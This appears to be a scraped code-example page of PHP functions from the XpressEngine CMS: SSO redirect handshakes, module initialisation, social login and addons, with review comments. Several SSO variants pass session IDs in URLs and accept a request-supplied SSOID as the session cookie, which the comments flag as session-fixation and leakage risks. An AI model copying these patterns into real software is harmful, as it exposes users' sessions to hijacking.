Ejemplo n.º 1
 /**
  * Single Sign On (SSO)
  *
  * @return bool True : Module handling is necessary in the control path of current request , False : Otherwise
  */
 public function checkSSO()
 {
     // Three-step redirect handshake between a non-default ("origin") site and the default
     // site. Returns TRUE when the caller should continue with normal request handling and
     // FALSE when this method has already sent a redirect or printed an error page.
     // pass if SSO is switched off or the client is a crawler
     if ($this->db_info->use_sso != 'Y' || isCrawler()) {
         return TRUE;
     }
     // pass if it's not GET request, XE is not yet installed, or the act is an rss/atom feed
     $checkActList = array('rss' => 1, 'atom' => 1);
     if (self::getRequestMethod() != 'GET' || !self::isInstalled() || isset($checkActList[self::get('act')])) {
         return TRUE;
     }
     // pass if default URL is not set
     $default_url = trim($this->db_info->default_url);
     if (!$default_url) {
         return TRUE;
     }
     // Force a trailing slash; the comparisons with $current_site below are strict string comparisons
     if (substr_compare($default_url, '/', -1) !== 0) {
         $default_url .= '/';
     }
     // Get current site information (only the base URL, not the full URL)
     $current_site = self::getRequestUri();
     // Step 1: if the current site is not the default site, send SSO validation request to the default site
     // NOTE(review): $_COOKIE['sso'] is read without isset(); with no cookie the comparison is
     // against NULL, which still evaluates as "different" but makes PHP report an undefined index.
     if ($default_url !== $current_site && !self::get('SSOID') && $_COOKIE['sso'] !== md5($current_site)) {
         // Set sso cookie to prevent multiple simultaneous SSO validation requests
         // (session-lifetime cookie on path '/'; the MD5 of the site URL is a marker, not a secret)
         setcookie('sso', md5($current_site), 0, '/');
         // Redirect to the default site
         // return_url carries the base64 of the current site and is not signed, so the default
         // site has to validate it on its own (Step 2).
         $redirect_url = sprintf('%s?return_url=%s', $default_url, urlencode(base64_encode($current_site)));
         header('Location:' . $redirect_url);
         return FALSE;
     }
     // Step 2: receive and process SSO validation request at the default site
     if ($default_url === $current_site && self::get('return_url')) {
         // Get the URL of the origin site
         // (request-controlled: any client can supply its own return_url value)
         $url = base64_decode(self::get('return_url'));
         $url_info = parse_url($url);
         // Check that the origin site is a valid site in this XE installation (to prevent open redirect vuln)
         // NOTE(review): the lookup receives the whole decoded URL (minus trailing slashes) while
         // the redirect below is rebuilt from parse_url() components; confirm that
         // getSiteInfoByDomain() reduces its argument to the same host, otherwise the validated
         // value and the redirect target can disagree.
         // NOTE(review): parse_url() may return false or omit 'scheme', 'host', 'port', 'path' or
         // 'query'; none of those cases is handled before the keys are read below.
         if (!getModel('module')->getSiteInfoByDomain(rtrim($url, '/'))->site_srl) {
             htmlHeader();
             echo self::getLang("msg_invalid_request");
             htmlFooter();
             return FALSE;
         }
         // Redirect back to the origin site
         // The default site's session ID is appended to the query string, so it can end up in the
         // origin site's access logs, in browser history and in Referer headers. The validation
         // above is therefore the security boundary of this step.
         $url_info['query'] .= ($url_info['query'] ? '&' : '') . 'SSOID=' . session_id();
         $redirect_url = sprintf('%s://%s%s%s%s', $url_info['scheme'], $url_info['host'], $url_info['port'] ? ':' . $url_info['port'] : '', $url_info['path'], $url_info['query'] ? '?' . $url_info['query'] : '');
         header('Location:' . $redirect_url);
         return FALSE;
     }
     // Step 3: back at the origin site, set session ID to be the same as the default site
     if ($default_url !== $current_site && self::get('SSOID')) {
         // Check that the session ID was given by the default site (to prevent session fixation CSRF)
         // NOTE(review): the check only runs when a Referer header is present, so a request that
         // carries none is accepted, and the header itself is client-supplied. Treat it as a weak
         // control; an SSOID that the default site signs and this site verifies would be stronger.
         if (isset($_SERVER['HTTP_REFERER']) && strpos($_SERVER['HTTP_REFERER'], $default_url) !== 0) {
             htmlHeader();
             echo self::getLang("msg_invalid_request");
             htmlFooter();
             return FALSE;
         }
         // Set session ID
         // The request parameter becomes this site's session cookie verbatim; no path, Secure or
         // HttpOnly arguments are passed to setcookie().
         setcookie(session_name(), self::get('SSOID'));
         // Finally, redirect to the originally requested URL
         // The pattern strips the SSOID pair only; a neighbouring '&' separator stays in the query.
         $url_info = parse_url(self::getRequestUrl());
         $url_info['query'] = preg_replace('/(^|\\b)SSOID=([^&?]+)/', '', $url_info['query']);
         $redirect_url = sprintf('%s://%s%s%s%s', $url_info['scheme'], $url_info['host'], $url_info['port'] ? ':' . $url_info['port'] : '', $url_info['path'], $url_info['query'] ? '?' . $url_info['query'] : '');
         header('Location:' . $redirect_url);
         return FALSE;
     }
     // If none of the conditions above apply, proceed normally
     return TRUE;
 }
Ejemplo n.º 2
 /**
  * Single Sign On (SSO)
  *
  * @return bool True : Module handling is necessary in the control path of current request , False : Otherwise
  */
 function checkSSO()
 {
     // Redirect handshake between a non-default site and the default site. Returns TRUE when
     // the caller should continue with normal request handling and FALSE (or false) when a
     // redirect header or an error has already been produced here.
     // pass if SSO is switched off or the client is a crawler
     if ($this->db_info->use_sso != 'Y' || isCrawler()) {
         return TRUE;
     }
     // pass if it's not GET request, XE is not yet installed, or the act is an rss/atom feed
     $checkActList = array('rss' => 1, 'atom' => 1);
     if (self::getRequestMethod() != 'GET' || !self::isInstalled() || isset($checkActList[self::get('act')])) {
         return TRUE;
     }
     // pass if default URL is not set
     $default_url = trim($this->db_info->default_url);
     if (!$default_url) {
         return TRUE;
     }
     // Force a trailing slash before comparing with the request URI
     if (substr_compare($default_url, '/', -1) !== 0) {
         $default_url .= '/';
     }
     // for sites receiving SSO validation
     if ($default_url == self::getRequestUri()) {
         if (self::get('default_url')) {
             // The return URL is request-controlled: any client can supply its own value
             $url = base64_decode(self::get('default_url'));
             $url_info = parse_url($url);
             // Only hosts registered as a site of this installation may receive the session ID
             // NOTE(review): parse_url() may return false or omit 'host'; that case reaches the
             // lookup as NULL and relies on getSiteInfoByDomain() returning no site_srl for it.
             $oModuleModel = getModel('module');
             $site_info = $oModuleModel->getSiteInfoByDomain($url_info['host']);
             if (!$site_info->site_srl) {
                 $oModuleObject = new ModuleObject();
                 $oModuleObject->stop('msg_invalid_request');
                 return false;
             }
             // The default site's session ID is appended to the query string of the redirect, so
             // it can end up in access logs, browser history and Referer headers of the target.
             $url_info['query'] .= ($url_info['query'] ? '&' : '') . 'SSOID=' . session_id();
             $redirect_url = sprintf('%s://%s%s%s?%s', $url_info['scheme'], $url_info['host'], $url_info['port'] ? ':' . $url_info['port'] : '', $url_info['path'], $url_info['query']);
             header('location:' . $redirect_url);
             return FALSE;
         }
         // for sites requesting SSO validation
     } else {
         // result handling : set session_name()
         // NOTE(review): any SSOID present in the request becomes this site's session cookie;
         // nothing visible here checks that the value was issued by the default site, which is
         // the precondition for session fixation. setcookie() also receives no path, Secure or
         // HttpOnly arguments.
         if ($session_name = self::get('SSOID')) {
             setcookie(session_name(), $session_name);
             // Drop the SSOID pair from the URL, then a trailing '?' or '&' if one is left over
             $url = preg_replace('/([\\?\\&])$/', '', str_replace('SSOID=' . $session_name, '', self::getRequestUrl()));
             header('location:' . $url);
             return FALSE;
             // send SSO request
         } else {
             // NOTE(review): $_COOKIE['sso'] is read without isset(); with no cookie PHP reports
             // an undefined index. The cookie only marks that a validation request was already sent.
             if (!self::get('SSOID') && $_COOKIE['sso'] != md5(self::getRequestUri())) {
                 setcookie('sso', md5(self::getRequestUri()), 0, '/');
                 // NOTE(review): base64 output can contain '+', '/' and '='; it is placed in the
                 // query string without urlencode(), so the receiving side may decode a different value.
                 $url = sprintf("%s?default_url=%s", $default_url, base64_encode(self::getRequestUrl()));
                 header('location:' . $url);
                 return FALSE;
             }
         }
     }
     return TRUE;
 }
Ejemplo n.º 3
 /**
  * Initialization. It finds the target module based on module, mid, document_srl, and prepares to execute an action
  * @return boolean true: OK, false: redirected
  **/
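 function init()
 {
     // Resolves the target module from module / mid / document_srl and prepares the handler.
     // Returns true when an action can be executed, false after a redirect header was sent or
     // when the after-init trigger failed.
     // NOTE(review): one branch below returns a language string instead of a boolean.
     $oModuleModel =& getModel('module');
     $site_module_info = Context::get('site_module_info');
     // Defined up front so the "!$module_info" checks below never read an unset variable
     $module_info = null;
     // Resolve an entry alias to a document_srl when only mid + entry were given
     if (!$this->document_srl && $this->mid && $this->entry) {
         $oDocumentModel =& getModel('document');
         $this->document_srl = $oDocumentModel->getDocumentSrlByAlias($this->mid, $this->entry);
         if ($this->document_srl) {
             Context::set('document_srl', $this->document_srl);
         }
     }
     // Get module's information based on document_srl, if it's specified
     if ($this->document_srl && !$this->module) {
         $module_info = $oModuleModel->getModuleInfoByDocumentSrl($this->document_srl);
         // If the document does not exist, remove document_srl
         if (!$module_info) {
             unset($this->document_srl);
         } else {
             // If it exists, compare mid based on the module information
             // if mids are not matching, set it as the document's mid
             if ($this->mid != $module_info->mid) {
                 $this->mid = $module_info->mid;
                 Context::set('mid', $module_info->mid, true);
                 // Redirect within the current site. $site_info is not assigned yet at this point,
                 // so the domain has to come from $site_module_info.
                 header('location:' . getNotEncodedSiteUrl($site_module_info->domain, 'mid', $this->mid, 'document_srl', $this->document_srl));
                 return false;
             }
         }
         // if requested module is different from one of the document, remove the module information retrieved based on the document number
         if ($this->module && $module_info->module != $this->module) {
             // Reset instead of unset() so later checks still see a defined variable
             $module_info = null;
         }
     }
     // If module_info is not set yet, and there exists mid information, get module information based on the mid
     if (!$module_info && $this->mid) {
         $module_info = $oModuleModel->getModuleInfoByMid($this->mid, $site_module_info->site_srl);
     }
     // redirect, if module_site_srl and site_srl are different
     if (!$this->module && !$module_info && $site_module_info->site_srl == 0 && $site_module_info->module_site_srl > 0) {
         $site_info = $oModuleModel->getSiteInfo($site_module_info->module_site_srl);
         header("location:" . getNotEncodedSiteUrl($site_info->domain, 'mid', $site_module_info->mid));
         return false;
     }
     // If module_info is not set still, and $module does not exist, find the default module
     if (!$module_info && !$this->module && !$this->mid) {
         $module_info = $site_module_info;
     }
     if (!$module_info && !$this->module && $site_module_info->module_site_srl) {
         $module_info = $site_module_info;
     }
     // redirect, if site_srl of module_info is different from one of site's module_info
     if ($module_info && $module_info->site_srl != $site_module_info->site_srl && !isCrawler()) {
         if ($module_info->site_srl) {
             // If the module is of virtual site
             $site_info = $oModuleModel->getSiteInfo($module_info->site_srl);
             $redirect_url = getNotEncodedSiteUrl($site_info->domain, 'mid', Context::get('mid'), 'document_srl', Context::get('document_srl'), 'module_srl', Context::get('module_srl'), 'entry', Context::get('entry'));
         } else {
             // If it's called from a virtual site, though it's not a module of the virtual site
             $db_info = Context::getDBInfo();
             if (!$db_info->default_url) {
                 // NOTE(review): returns a message string, not a boolean; kept for callers that rely on it
                 return Context::getLang('msg_default_url_is_not_defined');
             }
             $redirect_url = getNotEncodedSiteUrl($db_info->default_url, 'mid', Context::get('mid'), 'document_srl', Context::get('document_srl'), 'module_srl', Context::get('module_srl'), 'entry', Context::get('entry'));
         }
         header("location:" . $redirect_url);
         return false;
     }
     // If module info was set, retrieve variables from the module information
     if ($module_info) {
         $this->module = $module_info->module;
         $this->mid = $module_info->mid;
         $this->module_info = $module_info;
         Context::setBrowserTitle($module_info->browser_title);
         // The layout's header_script is added to the HTML head as stored in the layout config
         $part_config = $oModuleModel->getModulePartConfig('layout', $module_info->layout_srl);
         Context::addHtmlHeader($part_config->header_script);
     }
     // Set module and mid into module_info
     // (create the holder first: assigning a property on an unset value is an error on current PHP)
     if (!isset($this->module_info)) {
         $this->module_info = new stdClass();
     }
     $this->module_info->module = $this->module;
     $this->module_info->mid = $this->mid;
     // Set site_srl add 2011 08 09
     $this->module_info->site_srl = $site_module_info->site_srl;
     // Still no module? it's an error
     if (!$this->module) {
         $this->error = 'msg_module_is_not_exists';
         $this->httpStatusCode = '404';
     }
     // If mid exists, set mid into context
     if ($this->mid) {
         Context::set('mid', $this->mid, true);
     }
     // Call a trigger after moduleHandler init
     $output = ModuleHandler::triggerCall('moduleHandler.init', 'after', $this->module_info);
     if (!$output->toBool()) {
         $this->error = $output->getMessage();
         return false;
     }
     // Set current module info into context
     Context::set('current_module_info', $this->module_info);
     return true;
 }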
Ejemplo n.º 4
 function dispSocialxeLogin()
 {
     // Starts a social login: either shows the login guidance page (JS flow) or stores the
     // request parameters in the session and redirects to the provider's login URL.
     // Do not run for crawlers,
     // so that no needless requests reach the SocialXE server.
     if (isCrawler()) {
         Context::close();
         exit;
     }
     // Reset the session values used for login.
     // The js2 parameter is checked so that, when JS is used, the reset happens on the first pass only.
     if (!Context::get('js2')) {
         $this->session->clearSession('js');
         $this->session->clearSession('mode');
         $this->session->clearSession('callback_query');
         $this->session->clearSession('widget_skin');
         $this->session->clearSession('info');
     }
     // Service (provider) name, taken from the request
     $provider = Context::get('provider');
     // Whether JS is used
     $use_js = Context::get('js');
     // Skin name of the widget
     $widget_skin = Context::get('skin');
     // Apply an empty layout
     $template_path = sprintf("%stpl/", $this->module_path);
     $this->setLayoutPath($template_path);
     $this->setLayoutFile("popup_layout");
     // 'xe' is rejected as a provider; every other value is passed on unchanged
     if ($provider == 'xe') {
         return $this->stop('msg_invalid_request');
     }
     // Check whether JS is used
     if (($use_js || Context::get('mode') == 'socialLogin') && !Context::get('js2')) {
         // Store the JS flag (and the widget skin) in the session.
         $this->session->setSession('js', $use_js);
         $this->session->setSession('widget_skin', $widget_skin);
         // URL to continue with after the login guidance page has been shown
         $url = getUrl('js', '', 'skin', '', 'js2', 1);
         Context::set('url', $url);
         // Show the login guidance page
         // Make the mobile page render properly even when not in mobile mode.
         if (class_exists('Mobile')) {
             if (!Mobile::isFromMobilePhone()) {
                 Context::addHtmlHeader('<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, user-scalable=yes, target-densitydpi=medium-dpi" />');
             }
         }
         // On 1.5 and later, where the minified jQuery is loaded, always load the min file (because of the mobile version)
         if (defined('__XE__')) {
             Context::addJsFile("./common/js/jquery.min.js", true, '', -100000);
         } else {
             Context::addJsFile("./common/js/jquery.js", true, '', -100000);
         }
         $this->setTemplatePath($template_path);
         $this->setTemplateFile('login');
         return;
     }
     // Query of the page to return to after authentication
     // NOTE(review): request-supplied values are stored in the session as received; confirm the
     // code that later builds the return URL from callback_query keeps it on this site.
     $callback_query = Context::get('query');
     $this->session->setSession('callback_query', $callback_query);
     // Operating mode
     $mode = Context::get('mode');
     $this->session->setSession('mode', $mode);
     // mid for which the social login is being processed
     $mid = Context::get('mid');
     $this->session->setSession('mid', $mid);
     // vid for which the social login is being processed
     $vid = Context::get('vid');
     $this->session->setSession('vid', $vid);
     // Whether this is the SocialXE info widget
     $info = Context::get('info');
     $this->session->setSession('info', $info);
     // Log out of the service that the login is being attempted for.
     $this->providerManager->doLogout($provider);
     $output = $this->communicator->getLoginUrl($provider);
     if (!$output->toBool()) {
         return $output;
     }
     $url = $output->get('url');
     // Redirect
     // The target is whatever the communicator returned for this provider; it is not checked here.
     header('Location: ' . $url);
     Context::close();
     exit;
 }
<?php

/* Copyright (C) NAVER <http://www.navercorp.com> */
// Refuse direct access: this file is only meant to be included by XE
defined('__XE__') or exit;
/**
 * @file image_name.addon.php
 * @author NAVER (developers@xpressengine.com)
 * @brief Display user image name/image mark
 *
 * Looks for elements such as <div class="member_MemberSerialNumber"> .... </div> in the
 * output, takes the member_srl from the class name and, if that member has an image name
 * or image mark, swaps it in.
 */
/**
 * Runs just before the content is displayed. Skipped for any other hook position, for the
 * page-content edit screen, for non-HTML responses and for crawlers.
 */
if (
    $called_position != "before_display_content"
    || Context::get('act') == 'dispPageAdminContentModify'
    || Context::getResponseMethod() != 'HTML'
    || isCrawler()
) {
    return;
}
// Load the library that defines the replacement callback
require_once './addons/member_extra_info/member_extra_info.lib.php';
// Rewrite every <div|span|a ... member_N ...> element through memberTransImageName().
// preg_replace_callback() yields NULL on a PCRE error; in that case (or when the result is
// empty) the original output is kept.
$temp_output = preg_replace_callback('!<(div|span|a)([^\\>]*)member_([0-9]+)([^\\>]*)>(.*?)\\<\\/(div|span|a)\\>!is', 'memberTransImageName', $output);
$output = $temp_output ? $temp_output : $output;
unset($temp_output);
/* End of file member_extra_info.addon.php */
/* Location: ./addons/member_extra_info/member_extra_info.addon.php */
Ejemplo n.º 6
 /**
  * Initialization. It finds the target module based on module, mid, document_srl, and prepares to execute an action
  * @return boolean true: OK, false: redirected
  * */
 function init()
 {
     // Resolves the target module from module / mid / document_srl and prepares the handler.
     // Returns FALSE after a redirect header was sent and TRUE otherwise; one branch returns a
     // language string, and an off-site return URL makes the method throw.
     $oModuleModel = getModel('module');
     $site_module_info = Context::get('site_module_info');
     // if success_return_url and error_return_url is incorrect
     // Both parameters come from the request. A value is rejected when parse_url() reports a
     // host that is neither the host of default_url nor the current site's domain.
     // NOTE(review): a value for which parse_url() reports no host skips the comparison
     // entirely. parse_url() is not a validator and may read a string differently from a
     // browser, so confirm that whatever consumes these URLs treats host-less values as local
     // paths only.
     // NOTE(review): the comparison is a case-sensitive string match on the host.
     $urls = array(Context::get('success_return_url'), Context::get('error_return_url'));
     foreach ($urls as $url) {
         if (empty($url)) {
             continue;
         }
         $urlInfo = parse_url($url);
         $host = $urlInfo['host'];
         $dbInfo = Context::getDBInfo();
         $defaultUrlInfo = parse_url($dbInfo->default_url);
         $defaultHost = $defaultUrlInfo['host'];
         if ($host && ($host != $defaultHost && $host != $site_module_info->domain)) {
             throw new Exception('msg_default_url_is_null');
         }
     }
     // Resolve an entry alias to a document_srl when only mid + entry were given
     if (!$this->document_srl && $this->mid && $this->entry) {
         $oDocumentModel = getModel('document');
         $this->document_srl = $oDocumentModel->getDocumentSrlByAlias($this->mid, $this->entry);
         if ($this->document_srl) {
             Context::set('document_srl', $this->document_srl);
         }
     }
     // Get module's information based on document_srl, if it's specified
     if ($this->document_srl) {
         $module_info = $oModuleModel->getModuleInfoByDocumentSrl($this->document_srl);
         // If the document does not exist, remove document_srl
         if (!$module_info) {
             unset($this->document_srl);
         } else {
             // If it exists, compare mid based on the module information
             // if mids are not matching, set it as the document's mid
             if (!$this->mid || $this->mid != $module_info->mid) {
                 // GET requests are redirected to the canonical URL; other methods only get the mid corrected
                 if (Context::getRequestMethod() == 'GET') {
                     $this->mid = $module_info->mid;
                     header('location:' . getNotEncodedSiteUrl($site_module_info->domain, 'mid', $this->mid, 'document_srl', $this->document_srl));
                     return FALSE;
                 } else {
                     $this->mid = $module_info->mid;
                     Context::set('mid', $this->mid);
                 }
             }
             // if requested module is different from one of the document, remove the module information retrieved based on the document number
             if ($this->module && $module_info->module != $this->module) {
                 unset($module_info);
             }
         }
     }
     // If module_info is not set yet, and there exists mid information, get module information based on the mid
     // NOTE(review): $module_info is unset (not merely empty) when no document_srl was given
     // or after the unset() above, so this read reports an undefined variable.
     if (!$module_info && $this->mid) {
         $module_info = $oModuleModel->getModuleInfoByMid($this->mid, $site_module_info->site_srl);
         //if($this->module && $module_info->module != $this->module) unset($module_info);
     }
     // redirect, if module_site_srl and site_srl are different
     if (!$this->module && !$module_info && $site_module_info->site_srl == 0 && $site_module_info->module_site_srl > 0) {
         $site_info = $oModuleModel->getSiteInfo($site_module_info->module_site_srl);
         header("location:" . getNotEncodedSiteUrl($site_info->domain, 'mid', $site_module_info->mid));
         return FALSE;
     }
     // If module_info is not set still, and $module does not exist, find the default module
     if (!$module_info && !$this->module && !$this->mid) {
         $module_info = $site_module_info;
     }
     if (!$module_info && !$this->module && $site_module_info->module_site_srl) {
         $module_info = $site_module_info;
     }
     // redirect, if site_srl of module_info is different from one of site's module_info
     if ($module_info && $module_info->site_srl != $site_module_info->site_srl && !isCrawler()) {
         // If the module is of virtual site
         if ($module_info->site_srl) {
             $site_info = $oModuleModel->getSiteInfo($module_info->site_srl);
             $redirect_url = getNotEncodedSiteUrl($site_info->domain, 'mid', Context::get('mid'), 'document_srl', Context::get('document_srl'), 'module_srl', Context::get('module_srl'), 'entry', Context::get('entry'));
             // If it's called from a virtual site, though it's not a module of the virtual site
         } else {
             $db_info = Context::getDBInfo();
             if (!$db_info->default_url) {
                 // NOTE(review): returns a message string where the docblock promises a boolean
                 return Context::getLang('msg_default_url_is_not_defined');
             } else {
                 $redirect_url = getNotEncodedSiteUrl($db_info->default_url, 'mid', Context::get('mid'), 'document_srl', Context::get('document_srl'), 'module_srl', Context::get('module_srl'), 'entry', Context::get('entry'));
             }
         }
         header("location:" . $redirect_url);
         return FALSE;
     }
     // If module info was set, retrieve variables from the module information
     if ($module_info) {
         $this->module = $module_info->module;
         $this->mid = $module_info->mid;
         $this->module_info = $module_info;
         Context::setBrowserTitle($module_info->browser_title);
         // Pick the mobile or the PC layout field depending on the client
         $viewType = Mobile::isFromMobilePhone() ? 'M' : 'P';
         $targetSrl = Mobile::isFromMobilePhone() ? 'mlayout_srl' : 'layout_srl';
         // use the site default layout.
         if ($module_info->{$targetSrl} == -1) {
             $oLayoutAdminModel = getAdminModel('layout');
             $layoutSrl = $oLayoutAdminModel->getSiteDefaultLayout($viewType, $module_info->site_srl);
         } else {
             $layoutSrl = $module_info->{$targetSrl};
         }
         // reset a layout_srl in module_info.
         $module_info->{$targetSrl} = $layoutSrl;
         // The layout's header_script is added to the HTML head as stored in the layout config
         $part_config = $oModuleModel->getModulePartConfig('layout', $layoutSrl);
         Context::addHtmlHeader($part_config->header_script);
     }
     // Set module and mid into module_info
     if (!isset($this->module_info)) {
         $this->module_info = new stdClass();
     }
     $this->module_info->module = $this->module;
     $this->module_info->mid = $this->mid;
     // Set site_srl add 2011 08 09
     $this->module_info->site_srl = $site_module_info->site_srl;
     // Still no module? it's an error
     if (!$this->module) {
         $this->error = 'msg_module_is_not_exists';
         $this->httpStatusCode = '404';
     }
     // If mid exists, set mid into context
     if ($this->mid) {
         Context::set('mid', $this->mid, TRUE);
     }
     // Call a trigger after moduleHandler init
     // A failing trigger records its message in $this->error but the method still returns TRUE
     $output = ModuleHandler::triggerCall('moduleHandler.init', 'after', $this->module_info);
     if (!$output->toBool()) {
         $this->error = $output->getMessage();
         return TRUE;
     }
     // Set current module info into context
     Context::set('current_module_info', $this->module_info);
     return TRUE;
 }
 /**
  * @brief Trigger for avoiding module id replacement
  * @description Resolves the problem that occurs when the mid of the document_srl differs from the mid in the address
  * @param object $oModule
  * @return object
  */
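 function _replaceMid(&$oModule)
 {
     // Trigger body: when the requested document belongs to a board attached to a timeline
     // board, either clears the page value or switches the handler's mid to the document's own
     // board. Always returns a new Object(); the work happens through $oModule, Context and
     // $this->curr_module_info / $this->origin_module_info.
     $mid = $oModule->mid;
     $module = $oModule->module;
     $document_srl = $oModule->document_srl;
     $site_module_info = Context::get('site_module_info');
     $oModuleModel = getModel('module');
     // Defined up front: no branch assigns it when mid is empty but a module or document_srl is given
     $curr_module_info = NULL;
     if ($mid) {
         $curr_module_info = $oModuleModel->getModuleInfoByMid($mid, $site_module_info->site_srl);
     } elseif (!$module && !$document_srl) {
         $curr_module_info = $site_module_info;
     }
     if (!$curr_module_info) {
         return new Object();
     }
     $oTimelineModel = getModel('timeline');
     $timeline_info = $oTimelineModel->getTimelineInfo($curr_module_info->module_srl);
     // Not a timeline board
     if (!$timeline_info) {
         return new Object();
     }
     $oDocumentModel = getModel('document');
     $oDocument = $oDocumentModel->getDocument($document_srl);
     $document_srl = $oDocument->get('document_srl');
     $module_srl = $oDocument->get('module_srl');
     // Defined up front: it is only assigned when the document qualifies below
     $origin_module_info = NULL;
     if ($oDocument->isExists()) {
         // The document is a notice of a board registered as a child board, but the
         // notice-merging feature is not in use
         $attach_info = $timeline_info->attach_info;
         if (in_array($module_srl, $attach_info) && $oDocument->get('is_notice') == 'Y' && $timeline_info->notice != 'Y') {
             return new Object();
         }
         // The document can be shown on the timeline board and is either a notice or passes
         // the document filter
         $attach_info[] = $timeline_info->module_srl;
         if (in_array($module_srl, $attach_info) && ($oDocument->get('is_notice') == 'Y' || $oTimelineModel->isFilterPassed($timeline_info->module_srl, $document_srl))) {
             $origin_module_info = $oModuleModel->getModuleInfoByModuleSrl($module_srl);
         }
     }
     // Store the current module info and the document's module info
     $this->curr_module_info = $curr_module_info;
     $this->origin_module_info = $origin_module_info;
     // The timeline module applies
     if ($origin_module_info && !isCrawler()) {
         if ($timeline_info->replace == 'Y') {
             // The "move to the original board" feature is in use: reset the page value
             Context::set('page', NULL);
         } else {
             // Avoid the module id replacement
             Context::set('mid', $oModule->mid = $origin_module_info->mid);
         }
     }
     return new Object();
 }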
Ejemplo n.º 8
<?php

/* Copyright (C) NAVER <http://www.navercorp.com> */
// Refuse direct access: this file is only meant to be included by XE
defined('__XE__') or exit;
/**
 * @file counter.addon.php
 * @author NAVER (developers@xpressengine.com)
 * @brief Counter add-on
 */
// Runs at the before_module_init hook only. The visit is counted when the request is not
// for the admin module, the response is HTML, XE is installed and the client is not a crawler.
if ($called_position == 'before_module_init') {
    if (
        Context::get('module') != 'admin'
        && Context::getResponseMethod() == 'HTML'
        && Context::isInstalled()
        && !isCrawler()
    ) {
        $oCounterController = getController('counter');
        $oCounterController->counterExecute();
    }
}
/* End of file counter.addon.php */
/* Location: ./addons/counter/counter.addon.php */
Ejemplo n.º 9
/* Copyright (C) NAVER <http://www.navercorp.com> */
if (!defined('__XE__')) {
    exit;
}
/**
 * @file member_communication.addon.php
 * @author NAVER (developers@xpressengine.com)
 * @brief Promote user communication
 *
 * - Pop-up the message if new message comes in
 * - When calling MemberModel::getMemberMenu, feature to send a message is added
 * - When calling MemberModel::getMemberMenu, feature to add a friend is added
 */
// Stop if the user is not logged in or the client is a crawler
$logged_info = Context::get('logged_info');
if (!$logged_info || isCrawler()) {
    return;
}
/**
 * Message/Friend menus are added on the pop-up window and member profile. Check if a new message is received
 * */
if ($this->module != 'member' && $called_position == 'before_module_init') {
    // Load a language file from the communication module
    Context::loadLang(_XE_PATH_ . 'modules/communication/lang');
    // Add menus on the member login information
    $oMemberController = getController('member');
    $oMemberController->addMemberMenu('dispCommunicationFriend', 'cmd_view_friend');
    $oMemberController->addMemberMenu('dispCommunicationMessages', 'cmd_view_message_box');
    $flag_file = _XE_PATH_ . 'files/member_extra_info/new_message_flags/' . getNumberingPath($logged_info->member_srl) . $logged_info->member_srl;
    if ($addon_info->use_alarm != 'N' && file_exists($flag_file)) {
        // Pop-up to display messages if a flag on new message is set
Ejemplo n.º 10
 /**
  * Single Sign On (SSO)
  *
  * @return bool True : Module handling is necessary in the control path of current request , False : Otherwise
  */
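 function checkSSO()
 {
     // Redirect handshake between a non-default site and the default site. Returns true when
     // the caller should continue with normal request handling and false when a redirect
     // header or an error has already been produced here.
     // pass if SSO is switched off or the client is a crawler
     if ($this->db_info->use_sso != 'Y' || isCrawler()) {
         return true;
     }
     // pass if it's not GET request, XE is not yet installed, or the act is an rss/atom feed
     $checkActList = array('rss' => 1, 'atom' => 1);
     if (Context::getRequestMethod() != 'GET' || !Context::isInstalled() || isset($checkActList[Context::get('act')])) {
         return true;
     }
     // pass if default URL is not set
     $default_url = trim($this->db_info->default_url);
     if (!$default_url) {
         return true;
     }
     if (substr($default_url, -1) != '/') {
         $default_url .= '/';
     }
     // for sites receiving SSO validation
     if ($default_url == Context::getRequestUri()) {
         if (Context::get('default_url')) {
             $url = base64_decode(Context::get('default_url'));
             $url_info = parse_url($url);
             // The return URL comes from the request and the redirect below carries this site's
             // session ID, so it may only go to a host registered as a site of this installation.
             // Without this check any client-chosen host would receive the session ID.
             // NOTE(review): getModel() and ModuleObject are not used elsewhere in this method;
             // confirm both are available this early in the request.
             $site_info = null;
             if (is_array($url_info) && !empty($url_info['scheme']) && !empty($url_info['host'])) {
                 $oModuleModel = getModel('module');
                 $site_info = $oModuleModel->getSiteInfoByDomain($url_info['host']);
             }
             if (!$site_info || !$site_info->site_srl) {
                 $oModuleObject = new ModuleObject();
                 $oModuleObject->stop('msg_invalid_request');
                 return false;
             }
             // Rebuild the target from the parsed parts; absent parts become empty strings
             $query = isset($url_info['query']) ? $url_info['query'] : '';
             $query .= ($query ? '&' : '') . 'SSOID=' . session_id();
             $port = isset($url_info['port']) ? ':' . $url_info['port'] : '';
             $path = isset($url_info['path']) ? $url_info['path'] : '';
             $redirect_url = sprintf('%s://%s%s%s?%s', $url_info['scheme'], $url_info['host'], $port, $path, $query);
             header('location:' . $redirect_url);
             return false;
         }
         // for sites requesting SSO validation
     } else {
         // result handling : set session_name()
         // NOTE(review): any SSOID present in the request becomes this site's session cookie;
         // nothing here checks that the value was issued by the default site. Closing that gap
         // needs a value both sites can verify and is left for a follow-up change.
         if (Context::get('SSOID')) {
             $session_name = Context::get('SSOID');
             setcookie(session_name(), $session_name);
             // Drop the SSOID pair from the URL, then a trailing '?' or '&' if one is left over
             $url = preg_replace('/([\\?\\&])$/', '', str_replace('SSOID=' . $session_name, '', Context::getRequestUrl()));
             header('location:' . $url);
             return false;
             // send SSO request
         } else {
             // The 'sso' cookie marks that a validation request was already sent for this site;
             // read it through isset() so a first visit does not raise an undefined index.
             $sso_marker = isset($_COOKIE['sso']) ? $_COOKIE['sso'] : null;
             if ($sso_marker != md5(Context::getRequestUri()) && !Context::get('SSOID')) {
                 setcookie('sso', md5(Context::getRequestUri()), 0, '/');
                 // base64 output can contain '+', '/' and '=', so it is URL-encoded for the query string
                 $url = sprintf("%s?default_url=%s", $default_url, urlencode(base64_encode(Context::getRequestUrl())));
                 header('location:' . $url);
                 return false;
             }
         }
     }
     return true;
 }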
Ejemplo n.º 11
 /**
  * Update read counts of the document
  * @param documentItem $oDocument
  * @return bool|void
  */
 function updateReadedCount(&$oDocument)
 {
     // Increments the read count of $oDocument unless one of the skip rules applies.
     // Returns false when the count was not touched, the trigger output object when a trigger
     // refused, and TRUE after a successful update.
     // Pass if Crawler access
     if (isCrawler()) {
         return false;
     }
     $oDocumentModel = getModel('document');
     $config = $oDocumentModel->getDocumentConfig();
     // view_count_option 'none' disables counting altogether
     if ($config->view_count_option == 'none') {
         return false;
     }
     $document_srl = $oDocument->document_srl;
     $member_srl = $oDocument->get('member_srl');
     $logged_info = Context::get('logged_info');
     // Call a trigger when the read count is updated (before)
